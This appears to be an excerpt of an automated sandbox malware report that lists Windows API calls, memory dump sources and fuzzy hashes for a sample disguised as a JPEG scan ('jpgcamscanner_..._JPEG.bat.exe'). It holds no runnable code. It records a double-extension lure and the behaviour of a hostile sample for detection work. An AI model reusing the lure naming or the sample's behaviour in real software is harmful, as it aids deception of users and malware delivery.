                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: CreateDirectoryErrorLast
                                  • String ID:
                                  • API String ID: 1375471231-0
                                  • Opcode ID: 6853200a5fdab59dd982fbc96a9ce2e8b021ac935e945b0af5f1b11de4538164
                                  • Instruction ID: 176dbb695fa69d1773a7d690fb999828ada584b34c1629d79551d48c85d86b1a
                                  • Opcode Fuzzy Hash: 6853200a5fdab59dd982fbc96a9ce2e8b021ac935e945b0af5f1b11de4538164
                                  • Instruction Fuzzy Hash: E1C08C30608101BBD6000B318D09B073A56AB00340F1084356002E00F4C6309100C93F
                                  APIs
                                  • RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402B7C,00000000,?,?), ref: 00405E47
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: c5562a190e42d8950a0f575b3a357be24d756bd6a7e1ac790deddfd4386432da
                                  • Instruction ID: 614deb5803ecfea412708c7c06f6093feae3e2eaa5d1670ea64157aa9e0e4aa4
                                  • Opcode Fuzzy Hash: c5562a190e42d8950a0f575b3a357be24d756bd6a7e1ac790deddfd4386432da
                                  • Instruction Fuzzy Hash: 1AE0ECB201454DBFEF095F90ED0ADBB371DEB14310F00492EFA16E40A0F6B5A920AA75
                                  APIs
                                  • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040318B,00000000,00000000,00402FE8,000000FF,00000004,00000000,00000000,00000000), ref: 00405B8F
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: FileRead
                                  • String ID:
                                  • API String ID: 2738559852-0
                                  • Opcode ID: 1302354f14da4ac18fdfad316f10263800e98e90a47707ba9ec6b51f8bbd6d6c
                                  • Instruction ID: 82daff948be82a3a54a064a8b67bdb156262b24a8193569c828015c470817b44
                                  • Opcode Fuzzy Hash: 1302354f14da4ac18fdfad316f10263800e98e90a47707ba9ec6b51f8bbd6d6c
                                  • Instruction Fuzzy Hash: AFE0EC3265425AABDF509E559C00BEB7BACEB453A0F008832F915E3190D235F9219BA5
                                  APIs
                                  • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,00000020,?,00403159,00000000,0040A8C0,00000020,0040A8C0,00000020,000000FF,00000004,00000000), ref: 00405BBE
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: FileWrite
                                  • String ID:
                                  • API String ID: 3934441357-0
                                  • Opcode ID: c136fe23a15198738cdde8d9ae5bd390bad499becbb6fab094427491a2b8e812
                                  • Instruction ID: 29870a228079f63f45527f16aa4763e95840d14b1a08b3071f6f7043dbe3ced8
                                  • Opcode Fuzzy Hash: c136fe23a15198738cdde8d9ae5bd390bad499becbb6fab094427491a2b8e812
                                  • Instruction Fuzzy Hash: EBE0EC3261429AABDF109F559C00EEB7B6CEB05361F144832FD15E6150E271F8219BB5
                                  APIs
                                  • VirtualProtect.KERNELBASE(6DDA404C,00000004,00000040,6DDA403C), ref: 6DDA2903
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19336656011.000000006DDA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6DDA0000, based on PE: true
                                  • Associated: 00000002.00000002.19336624915.000000006DDA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000002.00000002.19336698506.000000006DDA3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000002.00000002.19336738516.000000006DDA5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_6dda0000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: ProtectVirtual
                                  • String ID:
                                  • API String ID: 544645111-0
                                  • Opcode ID: 178121d10c772b07a4abf6337ecaf8d20a9400d160935933870159fbf17a43e9
                                  • Instruction ID: 69f9bda1f8b421b5c42a52b2244b3564e51dcbbfe51a08cd1e4d61d974cc96f4
                                  • Opcode Fuzzy Hash: 178121d10c772b07a4abf6337ecaf8d20a9400d160935933870159fbf17a43e9
                                  • Instruction Fuzzy Hash: FFF0A5B15C82A1DEEB60FF69C46471A3FF0A31E354B1AC52AE15CD7241EB385048BB1D
                                  APIs
                                  • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402373
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: PrivateProfileString
                                  • String ID:
                                  • API String ID: 1096422788-0
                                  • Opcode ID: 5b82fafcaaec8a5acc648c7dfa3e14f41738cacad1081e8147d88725ac003824
                                  • Instruction ID: 95cdf8392c9de35cfe821bde4bcbabdc9096ffea94e6ef07c2b1f4e495c6c526
                                  • Opcode Fuzzy Hash: 5b82fafcaaec8a5acc648c7dfa3e14f41738cacad1081e8147d88725ac003824
                                  • Instruction Fuzzy Hash: 3DE08630E04204BADB10AFA18E0AEAD3678AF41714F14883AF9507B0E1EAB944419B3D
                                  APIs
                                  • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,00405E7E,?,?,?,?,00000002,Call), ref: 00405E14
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: Open
                                  • String ID:
                                  • API String ID: 71445658-0
                                  • Opcode ID: 688c0e3dac6200a4dcf5f70578aed2939ff3afbafb421f65443b8838c7a2b092
                                  • Instruction ID: ba5dad521a6b40c9e54b5391ff095803b52aec86cb211a8a265cc86c886d2883
                                  • Opcode Fuzzy Hash: 688c0e3dac6200a4dcf5f70578aed2939ff3afbafb421f65443b8838c7a2b092
                                  • Instruction Fuzzy Hash: 2AD0123214460DBBDF115F90EC05FAB371DFB14311F004426FE45A4091D375D670AB99
                                  APIs
                                  • SendMessageA.USER32(00010412,00000000,00000000,00000000), ref: 00404067
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: MessageSend
                                  • String ID:
                                  • API String ID: 3850602802-0
                                  • Opcode ID: 875450fc840247aea6e73403ee44149e02d5474b467ece0a28835bfda1230da9
                                  • Instruction ID: b219db4bd4a8167c49179a39135beeb084f81f4a85e7e9c76e455f2dfd64676a
                                  • Opcode Fuzzy Hash: 875450fc840247aea6e73403ee44149e02d5474b467ece0a28835bfda1230da9
                                  • Instruction Fuzzy Hash: C6C09B717443007BEA31CB609D49F0777586B90B00F5584357311F50D0C6B4E451D62D
                                  APIs
                                  • SendMessageA.USER32(00000028,?,00000001,00403E6E), ref: 0040404C
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: MessageSend
                                  • String ID:
                                  • API String ID: 3850602802-0
                                  • Opcode ID: 3bdb3c033a7d800f3f5983e71921b41162ac414239058931643885a1338ef954
                                  • Instruction ID: 7b5ccc39adf6f72de5191684d4495c6b43ffe58f78915606d69c4a7e6f44d702
                                  • Opcode Fuzzy Hash: 3bdb3c033a7d800f3f5983e71921b41162ac414239058931643885a1338ef954
                                  • Instruction Fuzzy Hash: F3B092B5684200BAEE224B40DD09F457EA2E7A4702F008024B300240B0C6B200A1DB19
                                  APIs
                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402F2A,?), ref: 0040319C
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: FilePointer
                                  • String ID:
                                  • API String ID: 973152223-0
                                  • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                  • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                  • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                  • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                                  APIs
                                  • KiUserCallbackDispatcher.NTDLL(?,00403E07), ref: 00404035
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: CallbackDispatcherUser
                                  • String ID:
                                  • API String ID: 2492992576-0
                                  • Opcode ID: 12c11760972377b051275edfb0549e2da63da5a0a3d5c66f9a0e944dd115ee42
                                  • Instruction ID: 627edf876ec6fe827e8ded8b6e0f84c3e1bff33d3b07c91bc4a796ca35ff40dd
                                  • Opcode Fuzzy Hash: 12c11760972377b051275edfb0549e2da63da5a0a3d5c66f9a0e944dd115ee42
                                  • Instruction Fuzzy Hash: CAA00176808101ABCB029B50FF09D9ABF62ABA5705B028435E65694174C7325865FF1A
                                  APIs
                                  • CharNextA.USER32(?,004032E3,"C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe",00000020,"C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe",00000000,?,00000006,00000008,0000000A), ref: 0040593A
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: CharNext
                                  • String ID:
                                  • API String ID: 3213498283-0
                                  • Opcode ID: 34075671c2b15bfe90313587f721bfb83bbc5626d38128025375f4e5ae623440
                                  • Instruction ID: 257f9b2ec13a44fcc4a6720f2fb510ce371e6781c3dd22a2fabd0d4683e6d8f0
                                  • Opcode Fuzzy Hash: 34075671c2b15bfe90313587f721bfb83bbc5626d38128025375f4e5ae623440
                                  • Instruction Fuzzy Hash: 35C080B0C0C680D7C62147208024D677FE1AA52370F644456F0C467250C2346C00CF27
                                  APIs
                                  • GetDlgItem.USER32(?,000003F9), ref: 00404A26
                                  • GetDlgItem.USER32(?,00000408), ref: 00404A31
                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A7B
                                  • LoadBitmapA.USER32(0000006E), ref: 00404A8E
                                  • SetWindowLongA.USER32(?,000000FC,00405005), ref: 00404AA7
                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404ABB
                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404ACD
                                  • SendMessageA.USER32(?,00001109,00000002), ref: 00404AE3
                                  • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404AEF
                                  • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404B01
                                  • DeleteObject.GDI32(00000000), ref: 00404B04
                                  • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404B2F
                                  • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404B3B
                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404BD0
                                  • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404BFB
                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C0F
